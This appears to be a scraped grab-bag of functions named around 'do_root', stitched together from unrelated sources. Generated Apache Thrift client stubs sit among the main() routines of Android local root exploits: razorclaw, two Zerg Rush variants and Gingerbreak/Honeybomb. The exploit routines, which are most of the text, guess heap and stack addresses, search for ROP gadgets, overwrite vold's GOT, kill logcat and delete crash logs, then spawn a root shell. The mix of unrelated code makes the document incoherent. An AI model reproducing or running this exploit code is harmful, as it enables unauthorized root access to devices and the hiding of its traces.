folly::Future<std::pair<folly::Unit, std::unique_ptr<apache::thrift::transport::THeader>>> MyRootAsyncClient::header_future_do_root(apache::thrift::RpcOptions& rpcOptions) { folly::Promise<std::pair<folly::Unit, std::unique_ptr<apache::thrift::transport::THeader>>> promise4; auto future5 = promise4.getFuture(); auto callback6 = folly::make_unique<apache::thrift::HeaderFutureCallback<folly::Unit>>(std::move(promise4), recv_wrapped_do_root, channel_); do_root(rpcOptions, std::move(callback6)); return future5; }
folly::Future<folly::Unit> MyRootAsyncClient::future_do_root(apache::thrift::RpcOptions& rpcOptions) { folly::Promise<folly::Unit> promise1; auto future2 = promise1.getFuture(); std::unique_ptr<apache::thrift::RequestCallback> callback3(new apache::thrift::FutureCallback<folly::Unit>(std::move(promise1), recv_wrapped_do_root, channel_, (rpcOptions.getUseForReadHeaders() ? &rpcOptions : nullptr))); do_root(rpcOptions, std::move(callback3)); return std::move(future2); }
folly::Future<folly::Unit> MyRootAsyncClient::future_do_root(apache::thrift::RpcOptions& rpcOptions) { folly::Promise<folly::Unit> promise1; auto future2 = promise1.getFuture(); auto callback3 = folly::make_unique<apache::thrift::FutureCallback<folly::Unit>>(std::move(promise1), recv_wrapped_do_root, channel_); do_root(rpcOptions, std::move(callback3)); return future2; }
void MyRootAsyncClient::sync_do_root(apache::thrift::RpcOptions& rpcOptions) { apache::thrift::ClientReceiveState _returnState; std::unique_ptr<apache::thrift::RequestCallback> callback0(new apache::thrift::ClientSyncCallback(&_returnState, getChannel()->getEventBase(), false)); do_root(rpcOptions, std::move(callback0)); getChannel()->getEventBase()->loopForever(); SCOPE_EXIT { if (_returnState.header() && !_returnState.header()->getHeaders().empty()) { rpcOptions.setReadHeaders(_returnState.header()->releaseHeaders()); } }; if (!_returnState.buf()) { assert(_returnState.exception()); std::rethrow_exception(_returnState.exception()); } recv_do_root(_returnState); }
int main(int argc, const char **argv) { char path[512]; char cmd[1024]; int rc; printf("razorclaw - asus backup local root exploit.\n"); printf("by androidroot.mobi\n"); printf("-------------------------------------------\n\n"); if(getuid() == 0) { if(argc > 1 && !strcasecmp(argv[1], "--install")) { printf("[+] installing SuperUser and su\n"); return do_root(); } else { printf("[-] already root and nothing to do.\n\n"); printf("[*] hint: to install SuperUser and su pass the " "--install parameter on the command line.\n"); return 1; } } readlink("/proc/self/exe", path, sizeof(path)); path[strrchr(path, '/') - path] = '\0'; if(chdir(path)) { printf("[-] could not chdir into directory: %s\n", path); return 2; } if(!mkdir_recursive(DB_DIR)) { printf("[-] could not create directory: %s\n", DB_DIR); return 3; } else { printf("[+] created fake relative path.\n"); } if(!create_database()) { printf("[-] failed to create fake database.\n"); return 4; } else { printf("[+] created fake database.\n"); } snprintf(cmd, sizeof(cmd), "/system/xbin/asus-backup %s %s/%s --install >/dev/null", SECURE_ARG, path, strrchr(argv[0], '/') + 1); if(argc > 1 && !strcasecmp(argv[1], "--install")) { rc = system(cmd); switch(rc) { case DO_ROOT_OK: printf("[!] successfully rooted your device.\n"); break; case DO_ROOT_FAIL_MOUNT: printf("[-] failed to remount /system\n"); break; case DO_ROOT_FAIL_SU: printf("[-] failed to install su binary\n"); break; case DO_ROOT_FAIL_SU_SUID: printf("[-] failed to set su binary suid\n"); break; case DO_ROOT_FAIL_APK: printf("[-] failed to install Superuser.apk\n"); break; default: printf("[-] unknown error occurred whist " "trying to root device: %d\n", rc); break; } } else { printf("[!] spawning your root shell...\n"); rc = execl("/system/xbin/asus-backup", "/system/xbin/asus-backup", SECURE_ARG, "/system/bin/sh", NULL); } return rc; }
void MyRootAsyncClient::do_root(std::function<void (::apache::thrift::ClientReceiveState&&)> callback) { do_root(std::unique_ptr<apache::thrift::RequestCallback>(new apache::thrift::FunctionReplyCallback(std::move(callback)))); }
folly::Future<folly::Unit> MyRootSvIf::future_do_root() { return apache::thrift::detail::si::future([&] { return do_root(); }); }
int main(int argc, char **argv, char **env) { uint32_t i = 0, ok = 0; char *ash[] = {sh, 0}; struct stat st; char version_release[256]; int tries=0; if (geteuid() == 0 && getuid() == 0 && strstr(argv[0], "boomsh")) do_root(); printf("\n[**] Zerg rush - Android 2.2/2.3 local root\n"); printf("[**] (C) 2011 Revolutionary. All rights reserved.\n\n"); printf("[**] Parts of code from Gingerbreak, (C) 2010-2011 The Android Exploid Crew.\n\n"); if (copy("/proc/self/exe", bsh) < 0 || copy("/system/bin/sh", sh) < 0) die("[-] Cannot copy boomsh."); chmod(bsh, 0711); stat(vold, &st); heap_addr = ((((st.st_size) + 0x8000) / 0x1000) + 1) * 0x1000; __system_property_get("ro.build.version.release", version_release); if (strstr(version_release, "2.2")) { heap_addr += 0x108; printf("[+] Found a Froyo ! 0x%08x\n", heap_addr); } else if (strstr(version_release, "2.3")) { heap_addr += 0x118; printf("[+] Found a GingerBread ! 0x%08x\n", heap_addr); } else { printf("[-] Not a 2.2/2.3 Android ...\n"); exit(-1); } system_ptr = (uint32_t) find_symbol("system"); if (check_addr(system_ptr) == -1) { printf("[-] High templars, we're doomed!\n"); exit(-1); } tries = 0; printf("[*] Scooting ...\n"); while(buffsz=allbuffsz[tries]) { if(checkcrash()) { printf("[+] Zerglings found a way to enter ! 0x%02x\n", buffsz); break; } tries++; } if(!buffsz) { printf("[-] Hellions with BLUE flames !\n"); exit(-1); } for (tries = 0; tries < 5; tries++) { find_stack_addr(); if (stack_addr != 0x41414141 && jumpsz) { printf("[+] Zerglings caused crash (good news): 0x%08x 0x%04x\n", stack_addr, jumpsz); break; } printf("[*] Trying a new path ...\n"); switch(tries) { case 0: case 2: case 4: heap_addr += 8; break; case 1: heap_addr += 0xb8; break; case 3: heap_addr -= 0x180; break; default: break; } } if (stack_addr == 0x41414141 || !jumpsz) { printf("[-] Zerglings did not leave interesting stuff\n"); exit(-1); } if (check_addr(stack_addr) == -1) { printf("[-] Siege tanks, we're doomed!\n"); exit(-1); } if (jumpsz > 108 + 12) { printf("[-] This terran has walled!\n"); exit(-1); } kill(logcat_pid, SIGKILL); unlink(crashlog); printf("[*] Researching Metabolic Boost ...\n"); find_rop_gadgets(); printf("[+] Speedlings on the go ! 0x%08x 0x%08x\n", stack_pivot, pop_r0); for(i=0; i<3; i++) { do_fault(); stat(sh, &st); if ((st.st_mode & 04000) == 04000) { printf("\n[+] Rush did it ! It's a GG, man !\n"); ok = 1; break; } else { printf("\n[-] Bad luck, our rush did not succeed :( (%d/%d)\n", i, 2); switch(i) { case 0: heap_addr += 16; break; case 1: heap_addr -=32; break; default: break; } } } if (ok) { char qemuprop[1]; property_get("ro.kernel.qemu",qemuprop,"0"); if (qemuprop[0]=='1') { printf("[+] Killing ADB and restarting as root... enjoy!\n"); fflush(stdout); sleep(1); kill(-1,SIGTERM); } else { printf("[-] Failed to set property to restart adb. Not killing.\n"); } } else { printf("Exiting. Try again later.\n"); fflush(stdout); sleep(1); kill(-1,SIGTERM); } return 0; }
int main(int argc, char **argv, char **env) { uint32_t i = 0, ok = 0; char *ash[] = {sh, 0}; struct stat st; char version_release[1024]; int tries=0; if (geteuid() == 0 && getuid() == 0 && strstr(argv[0], "boomsh")) do_root(); printf("\n[**] Zerg rush - Android 2.2/2.3 local root\n"); printf("[**] (C) 2011 Revolutionary. All rights reserved.\n\n"); printf("[**] Parts of code from Gingerbreak, (C) 2010-2011 The Android Exploid Crew.\n\n"); if (copy("/proc/self/exe", bsh) < 0 || copy("/system/bin/sh", sh) < 0) die("[-] Cannot copy boomsh."); chmod(bsh, 0711); stat(vold, &st); heap_base_addr = ((((st.st_size) + 0x8000) / 0x1000) + 1) * 0x1000; __system_property_get("ro.build.version.release", version_release); if (strstr(version_release, "2.2")) { heap_offset = 0x108; printf("[+] Found a Froyo ! 0x%08x\n", heap_offset); } else if (strstr(version_release, "2.3")) { heap_offset = 0x118; printf("[+] Found a GingerBread ! 0x%08x\n", heap_offset); } else { printf("[-] Not a 2.2/2.3 Android ...\n"); exit(-1); } heap_addr = 0xffffff; __system_property_get("ro.build.fingerprint", version_release); if(!strncmp(version_release, "samsung", 7)) { printf("[+] Found a Samsung, running Samsung mode\n"); samsung = 1; } system_ptr = (uint32_t) find_symbol("system"); libc_base = system_ptr & 0xfff00000; if (check_addr(system_ptr) == -1) { printf("[-] High templars, we're doomed!\n"); exit(-1); } tries = 0; printf("[*] Scooting ...\n"); while(buffsz=allbuffsz[tries]) { if(checkcrash()) { printf("[+] Zerglings found a way to enter ! 0x%02x\n", buffsz); break; } tries++; } if(!buffsz) { printf("[-] Hellions with BLUE flames !\n"); exit(-1); } for (tries = 0; tries < 2; tries++) { heap_oracle(); find_stack_addr(); if (stack_addr != 0x41414141 && jumpsz) { printf("[+] Zerglings caused crash (good news): 0x%08x 0x%04x\n", stack_addr, jumpsz); break; } } if (stack_addr == 0x41414141 || !jumpsz) { printf("[-] Zerglings did not leave interesting stuff\n"); exit(-1); } if (check_addr(stack_addr) == -1) { if(bad_byte(stack_addr & 0xff)) { stack_addr += 4; adjust = 4; if (check_addr(stack_addr) == -1) { printf("[-] Siege tanks, we're doomed!\n"); exit(-1); } } else { printf("[-] Siege tanks, we're doomed!\n"); exit(-1); } } if (jumpsz > 108 + 12) { printf("[-] This terran has walled!\n"); exit(-1); } if(check_libc_base()) { system_ptr = libc_base + (system_ptr & 0x000fffff); printf("[*] Creating more creep 0x%08x ...\n", system_ptr); if (check_addr(system_ptr) == -1) { printf("[-] High templars, we're doomed!\n"); exit(-1); } } kill(logcat_pid, SIGKILL); unlink(crashlog); printf("[*] Researching Metabolic Boost ...\n"); find_rop_gadgets(); printf("[+] Speedlings on the go ! 0x%08x 0x%08x\n", stack_pivot, pop_r0); do_fault(); stat(sh, &st); if ((st.st_mode & 04000) == 04000) { char qemuprop[1]; printf("\n[+] Rush did it ! It's a GG, man !\n"); property_get("ro.kernel.qemu",qemuprop,"0"); if (qemuprop[0]=='1') { printf("[+] Killing ADB and restarting as root... enjoy!\n"); fflush(stdout); sleep(1); kill(-1, SIGTERM); } else { printf("[-] Failed to set property to restart adb. Not killing.\n"); } } else { printf("\n[-] Bad luck, our rush did not succeed :(\n"); fflush(stdout); sleep(1); kill(-1, SIGTERM); } return 0; }
int main(int argc, char **argv, char **env) { uint32_t i = 0, j = 0, idx = 0; char *ash[] = {sh, 0}; struct stat st; char build_id[256], version_release[256]; if (geteuid() == 0 && getuid() == 0 && strstr(argv[0], "boomsh")) do_root(); printf("\n[**] Gingerbreak/Honeybomb -- android 2.[2,3], 3.0 softbreak\n"); printf("[**] (C) 2010-2011 The Android Exploid Crew. All rights reserved.\n"); printf("[**] Kudos to jenzi, the #brownpants-party, the Open Source folks,\n"); printf("[**] Zynamics for ARM skills and Onkel Budi\n\n"); printf("[**] donate to [email protected] if you like\n[**] Exploit may take a while!\n\n"); if (copy("/proc/self/exe", bsh) < 0 || copy("/system/bin/sh", sh) < 0) die("[-] Cannot copy boomsh."); chmod(bsh, 0711); printf("[+] start __system_property_get(\"ro.build.id\", build_id)\n"); __system_property_get("ro.build.id", build_id); printf("[+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+]end __system_property_get(\"ro.build.id\", build_id)\n"); __system_property_get("ro.build.version.release", version_release); printf("[+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] end __system_property_get(\"ro.build.version.release\", version_release)\n"); if (strstr(build_id, "HONEY") || strstr(build_id, "Honey") || strstr(build_id, "honey") || strstr(version_release, "comb")) { printf("[+] Detected honeycomb! Starting honeybomb mode (scale=10).\n"); scale = 10; honeycomb = 1; } else if (strstr(build_id, "FR") || strstr(build_id, "Fr") || strstr(build_id, "fr")) { printf("[+] Detected Froyo!\n"); froyo = 1; } else printf("[+] Plain Gingerbread mode!\n"); find_vold(&vold); find_got("/system/bin/vold"); find_device(); printf("[*] vold: %04d GOT start: 0x%08x GOT end: 0x%08x\n", vold.pid, vold.got_start, vold.got_end); printf("[*] start find_index\n"); idx = find_index(); printf("[*] idx: %04d GOT idx\n", idx); kill(logcat_pid, SIGKILL); unlink(crashlog); printf("[*] _________________end unlink\n"); for (i = idx; j++ < (vold.got_end - vold.got_start); --i) { if (do_fault(i, 0) < 0) { ++i; --j; printf("[-] sendmsg() failed?\n"); continue; } printf("[*] vold: %04d idx: %08d\n", vold.pid, -i); fflush(stdout); stat(sh, &st); if ((st.st_mode & 04000) == 04000) { printf("\n\n[!] dance forever my only one\n"); break; } } /* Last try, sometimes vold cant handle 2 receives in the order * we like by do_fault() */ if ((st.st_mode & 04000) != 04000) { last_try(); last_try(); stat(sh, &st); if ((st.st_mode & 04000) == 04000) { printf("\n[+] You are in luck! Last try succeeded!\n"); } else { printf("\n[-] Bad luck. Fixed vold?\n"); exit(1); } } execve(*ash, ash, env); return 0; }
void MyRootAsyncClient::do_root(std::function<void (::apache::thrift::ClientReceiveState&&)> callback) { do_root(folly::make_unique<apache::thrift::FunctionReplyCallback>(std::move(callback))); }